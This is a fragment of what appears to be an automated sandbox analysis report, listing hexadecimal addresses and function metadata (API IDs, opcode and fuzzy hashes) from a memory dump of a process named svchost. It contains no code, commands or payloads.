                                                                                                                                                                                                                                                                            0x0401c36c
                                                                                                                                                                                                                                                                            0x0401c371
                                                                                                                                                                                                                                                                            0x0401c374
                                                                                                                                                                                                                                                                            0x0401c37d
                                                                                                                                                                                                                                                                            0x0401c390
                                                                                                                                                                                                                                                                            0x0401c39c
                                                                                                                                                                                                                                                                            0x0401c3b2
                                                                                                                                                                                                                                                                            0x0401c3b7
                                                                                                                                                                                                                                                                            0x0401c3ba
                                                                                                                                                                                                                                                                            0x0401c3c3
                                                                                                                                                                                                                                                                            0x0401c3d8
                                                                                                                                                                                                                                                                            0x0401c39e
                                                                                                                                                                                                                                                                            0x0401c3a6
                                                                                                                                                                                                                                                                            0x0401c3a6
                                                                                                                                                                                                                                                                            0x0401c3e2
                                                                                                                                                                                                                                                                            0x0401c3f3
                                                                                                                                                                                                                                                                            0x0401c3f7
                                                                                                                                                                                                                                                                            0x0401c3fc
                                                                                                                                                                                                                                                                            0x0401c401
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401c407
                                                                                                                                                                                                                                                                            0x0401c40e
                                                                                                                                                                                                                                                                            0x0401c415
                                                                                                                                                                                                                                                                            0x0401c423
                                                                                                                                                                                                                                                                            0x0401c443
                                                                                                                                                                                                                                                                            0x0401c463
                                                                                                                                                                                                                                                                            0x0401c465
                                                                                                                                                                                                                                                                            0x0401c46c
                                                                                                                                                                                                                                                                            0x0401c473
                                                                                                                                                                                                                                                                            0x0401c473
                                                                                                                                                                                                                                                                            0x0401c445
                                                                                                                                                                                                                                                                            0x0401c445
                                                                                                                                                                                                                                                                            0x0401c44c
                                                                                                                                                                                                                                                                            0x0401c453
                                                                                                                                                                                                                                                                            0x0401c453
                                                                                                                                                                                                                                                                            0x0401c425
                                                                                                                                                                                                                                                                            0x0401c425
                                                                                                                                                                                                                                                                            0x0401c42c
                                                                                                                                                                                                                                                                            0x0401c433
                                                                                                                                                                                                                                                                            0x0401c433
                                                                                                                                                                                                                                                                            0x0401c482
                                                                                                                                                                                                                                                                            0x0401c494
                                                                                                                                                                                                                                                                            0x0401c49c
                                                                                                                                                                                                                                                                            0x0401c4aa
                                                                                                                                                                                                                                                                            0x0401c4ac
                                                                                                                                                                                                                                                                            0x0401c4ac
                                                                                                                                                                                                                                                                            0x0401c3eb
                                                                                                                                                                                                                                                                            0x0401c3f0
                                                                                                                                                                                                                                                                            0x0401c3f0
                                                                                                                                                                                                                                                                            0x0401c4bb
                                                                                                                                                                                                                                                                            0x0401c4c3
                                                                                                                                                                                                                                                                            0x0401c4ca
                                                                                                                                                                                                                                                                            0x0401c4d1
                                                                                                                                                                                                                                                                            0x0401c4d6
                                                                                                                                                                                                                                                                            0x0401c4dc
                                                                                                                                                                                                                                                                            0x0401c4dc
                                                                                                                                                                                                                                                                            0x0401c4e9
                                                                                                                                                                                                                                                                            0x0401c4fa
                                                                                                                                                                                                                                                                            0x0401c501
                                                                                                                                                                                                                                                                            0x0401c506
                                                                                                                                                                                                                                                                            0x0401c50c
                                                                                                                                                                                                                                                                            0x0401c50c
                                                                                                                                                                                                                                                                            0x0401c517
                                                                                                                                                                                                                                                                            0x0401c51c
                                                                                                                                                                                                                                                                            0x0401c523
                                                                                                                                                                                                                                                                            0x0401c528
                                                                                                                                                                                                                                                                            0x0401c52b
                                                                                                                                                                                                                                                                            0x0401c52b
                                                                                                                                                                                                                                                                            0x0401c517
                                                                                                                                                                                                                                                                            0x0401c534
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401c534
                                                                                                                                                                                                                                                                            0x0401c31f
                                                                                                                                                                                                                                                                            0x0401c326
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401c326
                                                                                                                                                                                                                                                                            0x0401c2f8
                                                                                                                                                                                                                                                                            0x0401c2da
                                                                                                                                                                                                                                                                            0x0401c540

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                                                                            • String ID: d$d
                                                                                                                                                                                                                                                                            • API String ID: 2102423945-195624457
                                                                                                                                                                                                                                                                            • Opcode ID: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                                            • Instruction ID: 6121a1327febe31ce23874249aa6888692dbc835ca9b57b63cb1d65f5ac047f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C79138B4E44218EBEB14DF94D484AEEB7B1FF49308F108559E816BB360D375EA81CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset_strlen
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 2279092321-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                                            • Instruction ID: 9095bb450417fa4dd51ea0b819b640531f396c38f351a606dd718691427917c8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B1142B5E00208FFDB10DFE4DD45BEE77B4AB48314F508254E61477280E635BA458B65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%